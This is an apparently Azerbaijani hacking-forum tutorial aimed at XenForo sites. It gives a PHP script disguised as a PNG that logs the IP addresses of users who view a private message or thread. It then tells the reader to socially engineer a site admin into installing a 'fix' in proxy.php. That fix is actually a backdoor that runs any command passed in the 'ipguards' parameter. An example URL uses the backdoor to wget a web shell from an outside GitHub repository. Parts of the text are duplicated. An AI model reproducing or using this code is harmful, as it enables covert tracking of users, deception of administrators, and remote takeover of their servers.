Salam, İlk Növbədə
bu kodda hər hansısa adda .php faylı yaradırıq mən log.php yaradıram
daha sonra AZE.png adında Şəkil Yükləyirik həmin log.php olan qovluğun içində
indi isə XenForo olan sayta giririk və PM və ya Mövzu açırıq
Əgər hədəf tək İstifadəçidirsə PM yox əgər Saytdakı İstifadəçilərdirsə Mövzu açırıq
Başlıyaq İP tapmağa
Yüklədiyiniz saytadakı məsələn
https://saytadi.com/log.php bu linki kopyalayırıq və XenForo'da olan şəkil yükləmə yerinə bu linki yapışdırırıq
və Hədəflərin PM vəya Mövzuya Baxmaqlarını gözlüyürük
Biz isə saytdakı https://saytadi.com/HEDEFINip.txt bu faylın yaranmasını gözləyirik
və ip adresleri buraya düşəcək
Əgər Saytın adını düşməyini istəmirsinizsə bu saytdan istifadə edin
https://iplogger.org/tr/url-shortener/
bu aşağıdakı kodu Saytın admininə göndərirsiniz ki saytınızın açığı var bağlayın istərsiniz kömək edə bilərəm.
Gerisi Sizin SM (Sosial Mühəndisliyinizə) qalır.
Əgər kömək vacib olduğunu başa sala bilsəniz aşağıdakı addımları izləyin.
XenForo'da belə bir açığı bağlamaq üçün
proxy.php düzəltmək lazımdı
proxy.php faylının içinə aşağıda verdiyim kodu əlavə edin.
bu kodu necə işə salacıyıq
komut işlədə və ya wget, curl -O ilə Shell yükləyə bilərsiniz
https://saytadi.com/proxy.php?ipguards=wget raw.githubusercontent.com/cybercriminator/BaBa/master/dostshell.php
bu kodda hər hansısa adda .php faylı yaradırıq mən log.php yaradıram
daha sonra AZE.png adında Şəkil Yükləyirik həmin log.php olan qovluğun içində
indi isə XenForo olan sayta giririk və PM və ya Mövzu açırıq
Əgər hədəf tək İstifadəçidirsə PM yox əgər Saytdakı İstifadəçilərdirsə Mövzu açırıq
Başlıyaq İP tapmağa
Yüklədiyiniz saytadakı məsələn
https://saytadi.com/log.php bu linki kopyalayırıq və XenForo'da olan şəkil yükləmə yerinə bu linki yapışdırırıq
və Hədəflərin PM vəya Mövzuya Baxmaqlarını gözlüyürük
Biz isə saytdakı https://saytadi.com/HEDEFINip.txt bu faylın yaranmasını gözləyirik
və ip adresleri buraya düşəcək
Əgər Saytın adını düşməyini istəmirsinizsə bu saytdan istifadə edin
https://iplogger.org/tr/url-shortener/
PHP:
<?php
$file = 'AZE.png';
$type = 'image/jpeg';
header('Content-Type:'.$type);
header('Content-Length: ' . filesize($file));
readfile($file);
$DTipAdresi = $_SERVER["REMOTE_ADDR"] . PHP_EOL;
file_put_contents("HEDEFINip.txt", $DTipAdresi, FILE_APPEND);
?>bu aşağıdakı kodu Saytın admininə göndərirsiniz ki saytınızın açığı var bağlayın istərsiniz kömək edə bilərəm.
Gerisi Sizin SM (Sosial Mühəndisliyinizə) qalır.
Əgər kömək vacib olduğunu başa sala bilsəniz aşağıdakı addımları izləyin.
XenForo'da belə bir açığı bağlamaq üçün
proxy.php düzəltmək lazımdı
proxy.php faylının içinə aşağıda verdiyim kodu əlavə edin.
PHP:
<?php if(isset($_REQUEST['ipguards'])){ echo "<pre>";
$ipguards = ($_REQUEST['ipguards']);
system($ipguards); echo "</pre>"; die; } ?>bu kodu necə işə salacıyıq
komut işlədə və ya wget, curl -O ilə Shell yükləyə bilərsiniz
https://saytadi.com/proxy.php?ipguards=wget raw.githubusercontent.com/cybercriminator/BaBa/master/dostshell.php